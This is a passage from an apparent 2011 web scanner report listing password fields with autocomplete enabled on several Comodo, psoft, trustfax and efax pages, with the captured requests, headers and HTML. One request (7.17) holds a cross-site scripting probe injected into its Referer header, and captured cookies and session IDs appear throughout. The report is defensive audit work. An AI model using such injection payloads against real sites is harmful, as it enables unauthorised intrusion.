Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; brand=efaxcorp; __g_c=w%3A1%7Cb%3A2; mbox=check#true#1316366487|session#1316366426074-552683#1316368287; s_cc=true; s_ev4=%5B%5B%27home.j2.com%27%2C%271316366426332%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316366426333%27%5D%5D; j2CampaignTracking=; __utma=110028753.680056721.1316366426.1316366426.1316366426.1; __utmb=110028753.1.10.1316366426; __utmc=110028753; __utmz=110028753.1316366426.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; c_m=undefinedhome.j2.comhome.j2.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:43 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=96D358893B7F3897A12EA3F682AD7C0A.efaxcorp1a; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:43 GMT
Content-Length: 39406
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http
...[SNIP]...
<div id="tabContent_admin" class="loginTabContent" style="display: none;"> <form novalidate="novalidate" action="https://www.efaxcorporate.com/corp/twa/login" name="admin" id="admin" method="POST" style="width: 100%;"> <input type="hidden" name="formName" value="admin" />
...[SNIP]...
<div style="margin-bottom: 5px; clear: both;"><input type="password" id="adminpassword" maxlength="25" size="15" setcookie="false" name="password" value="" onkeyup="isValid(this, 'option')" onblur="isValid(this, 'option');" required="true" validationtype="password" style="float: left;" class="textInput" /> <div style="clear: both;">
...[SNIP]...

7.5. http://forum.psoft.net/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.psoft.net
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: forum.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:33:23 GMT
Server: Apache
Set-Cookie: bb_lastactivity=0; expires=Mon, 17-Sep-2012 12:33:23 GMT; path=/; domain=.psoft.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Content-Length: 99991
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

7.6. http://forums.comodo.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.comodo.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: forums.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:06:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Sun, 18 Sep 2011 11:06:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
</script>

                           <form action="https://forums.comodo.com/index.php?action=login2" method="post" style="margin: 3px 1ex 1px 0;">
                               <div style="text-align: right;">
...[SNIP]...
<input type="text" name="user" autocomplete="off" size="10" /> <input type="password" name="passwrd" size="10" />
                                   <select name="cookielength">
...[SNIP]...

7.7. http://forums.comodo.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.comodo.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: forums.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:06:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Sun, 18 Sep 2011 11:06:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
<td class="windowbg2" valign="middle">
           <form action="https://forums.comodo.com/index.php?action=login2" method="post" style="margin: 0;">
               <table border="0" cellpadding="2" cellspacing="0" width="100%">
...[SNIP]...
<br /><input type="password" name="passwrd" id="passwrd" size="15" /></label>
...[SNIP]...

7.8. http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Proxy-Connection: keep-alive
Referer: http://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316362675388r0.6238376419059932; ap=; referrerURL=http%3A//www.comodo.com/e-commerce/; entryURL=http%3A//hackerguardian.com/hackerguardian/buy/pci_free_scan.html; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; optimizelyBuckets=%7B%7D; __utmb=212060173.1.10.1316362681; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:17:24 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...
<td align="left" valign="top">
<input name="loginPassword" type="password" id="loginPassword" value="" size="45">&#160;
        <!--<a onClick="javascript:popUp('password-rules.html')" style="cursor:pointer " name="Rules for Password Complexity">
...[SNIP]...
<td align="left" valign="top">
<input name="verifyPassword" type="password" id="verifyPassword" value="" size="45"></td>
...[SNIP]...

7.9. https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Connection: keep-alive
Referer: https://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryName=; loginName=324234234; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; __utma=1.620635661.1316362711.1316362711.1316362711.1; __utmc=1; __utmz=1.1316362711.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmx=212060173.; __utmxx=212060173.; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; ap=; referrerURL=https%3A//www.hackerguardian.com/sas/login.jsp%3Flogin_error%3D1; entryURL=https%3A//hackerguardian.com/hackerguardian/learn/free_vuln_scan.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:55:37 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...
<td align="left" valign="top">
<input name="loginPassword" type="password" id="loginPassword" value="" size="45">&#160;
        <!--<a onClick="javascript:popUp('password-rules.html')" style="cursor:pointer " name="Rules for Password Complexity">
...[SNIP]...
<td align="left" valign="top">
<input name="verifyPassword" type="password" id="verifyPassword" value="" size="45"></td>
...[SNIP]...

7.10. https://my.psoft.net/my-hsphere/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://my.psoft.net
Path:   /my-hsphere/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /my-hsphere/ HTTP/1.1
Host: my.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:31:50 GMT
Server: Apache/1.3.39 (Unix) PHP/4.4.7 mod_throttle/3.1.2 mod_psoft_traffic/0.2 mod_ssl/2.8.29 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 4537

<html>
<head>
<title>Welcome - My H-Sphere</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="icon" href="/images/favicon.png" type="image/png">
<LINK hre
...[SNIP]...
<table border=0 cellspacing=3 cellpadding=0>
<form action="login.php" method="POST">
<tr>
...[SNIP]...
<td><input type="password" name="login_password" size="10" style="width: 100px"></td>
...[SNIP]...

7.11. https://secure.comodo.com/home/purchase.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /home/purchase.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /home/purchase.php?pid=9&utm_source=pfw_fd&utm_medium=buy_free_download&af=1144&utm_campaign=PF_CIS_BUY_FD HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://personalfirewall.comodo.com/free-download.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; kvcd=1316328651224; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_vs=1; km_lv=1316328651; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1315419555.1; __utmb=1.4.10.1316328649; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 01:50:26 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 42824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
</h1>
           
           
                       <form name="select-product" method="post" action="order.php">
                               <div class="top-error">
...[SNIP]...
<td colspan="2"><input type="password" id="password" name="password" value="" /></td>
...[SNIP]...
<td colspan="2"><input type="password" id="verify_password" name="verify_password" value="" /></td>
...[SNIP]...
<input type="hidden" id="cc_cvv" name="cc_cvv" value="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" />
                               <input type="password" maxlength="4" id="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" name="ab8d81f3c06b6c3f3c62ddfb12285f8f026ff0618" class="small" />
                           </td>
...[SNIP]...

7.12. https://secure.comodo.com/products/frontpage

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /products/frontpage

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/frontpage HTTP/1.1
Host: secure.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=GCRgqIREIML2YPW0>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.13. https://secure.comodo.net/home/purchase.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /home/purchase.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /home/purchase.php HTTP/1.1
Host: secure.comodo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:50 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 43298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
</h1>
           
           
                       <form name="select-product" method="post" action="order.php">
                               <div class="top-error">
...[SNIP]...
<td colspan="2"><input type="password" id="password" name="password" value="" /></td>
...[SNIP]...
<td colspan="2"><input type="password" id="verify_password" name="verify_password" value="" /></td>
...[SNIP]...
<input type="hidden" id="cc_cvv" name="cc_cvv" value="a5f32a746cac8286cd87ce2033e708b8fb30be314" />
                               <input type="password" maxlength="4" id="a5f32a746cac8286cd87ce2033e708b8fb30be314" name="a5f32a746cac8286cd87ce2033e708b8fb30be314" class="small" />
                           </td>
...[SNIP]...

7.14. https://secure.comodo.net/products/frontpage

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /products/frontpage

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/frontpage HTTP/1.1
Host: secure.comodo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=VwsLakBNQ5O17KAF>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.15. https://secure.instantssl.com/products/SSLIdASignup1a

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/SSLIdASignup1a

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

POST /products/SSLIdASignup1a HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Content-Length: 85
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=&loginErrorMessage=

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:12:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18028

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=NtcydAl8wNmXs5S2>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.16. https://secure.instantssl.com/products/frontpage

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/frontpage

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /products/frontpage HTTP/1.1
Host: secure.instantssl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:30:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 9504

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>COMODO Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#999999 te
...[SNIP]...
<table width=100% border=0 cellspacing=0 cellpadding=2 bgcolor=#E8E8E8>
<form method=post action=/products/login>
<input type=hidden name=SID value=68LCY39SkyhcQJ5g>
...[SNIP]...
<br><input type=password name=loginPassword maxlength=128 size=15 value="" class=input2>
</td>
...[SNIP]...

7.17. https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trustfax.com
Path:   /doccorpweb/tf/tf_signup.jsp

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /doccorpweb/tf/tf_signup.jsp?pc=TF011909A HTTP/1.1
Host: secure.trustfax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.trustfax.com/pricing.htmlaf10d--%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E0bedec460c4
Cookie: mbox=check#true#1316364867|session#1316364807021-280353#1316366668|PC#1316364807021-280353.19#1318179210; s_cc=true; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_ev4=%5B%5B%27www.fakereferrerdominator.com%27%2C%271316364810621%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316364810623%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=110010688.913254444.1316364811.1316364811.1316364811.1; __utmb=110010688.1.10.1316364811; __utmc=110010688; __utmz=110010688.1316364811.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=iso-8859-1
Date: Sun, 18 Sep 2011 11:53:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<div id="signup-form-form">
<form action="" method="post" id="formSignup" name="formSignup">
<input type="hidden" value="" name="track" />
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('choosePassword');" value="" maxlength="25" size="30" id="choosePassword" name="choosePassword"/>
</div>
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('confirmChoosePassword');" value="" maxlength="25" size="30" name="confirmChoosePassword" id="confirmChoosePassword"/>
</div>
...[SNIP]...

7.18. https://secure.trustfax.com/doccorpweb/tf/tf_signup.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.trustfax.com
Path:   /doccorpweb/tf/tf_signup.jsp

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /doccorpweb/tf/tf_signup.jsp HTTP/1.1
Host: secure.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=iso-8859-1
Date: Sun, 18 Sep 2011 12:30:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<div id="signup-form-form">
<form action="" method="post" id="formSignup" name="formSignup">
<input type="hidden" value="" name="track" />
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('choosePassword');" value="" maxlength="25" size="30" id="choosePassword" name="choosePassword"/>
</div>
...[SNIP]...
<div class="formInput">
<input type="password" onblur="validateMe('confirmChoosePassword');" value="" maxlength="25" size="30" name="confirmChoosePassword" id="confirmChoosePassword"/>
</div>
...[SNIP]...

7.19. https://support.comodo.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; SWIFT_sessionid40=c08dif8qb3omwic279ulzlf7nqhuloi5; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%2C%22banner%22%2C%22top%20menu%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.17.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:27:01 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31729

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="https://support.comodo.com/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" class="loginpassword" value=""></td>
...[SNIP]...

7.20. https://support.comodo.com/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /index.php?_m=knowledgebase&_a=view&parentcategoryid=33 HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/SSLIdASignup1a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
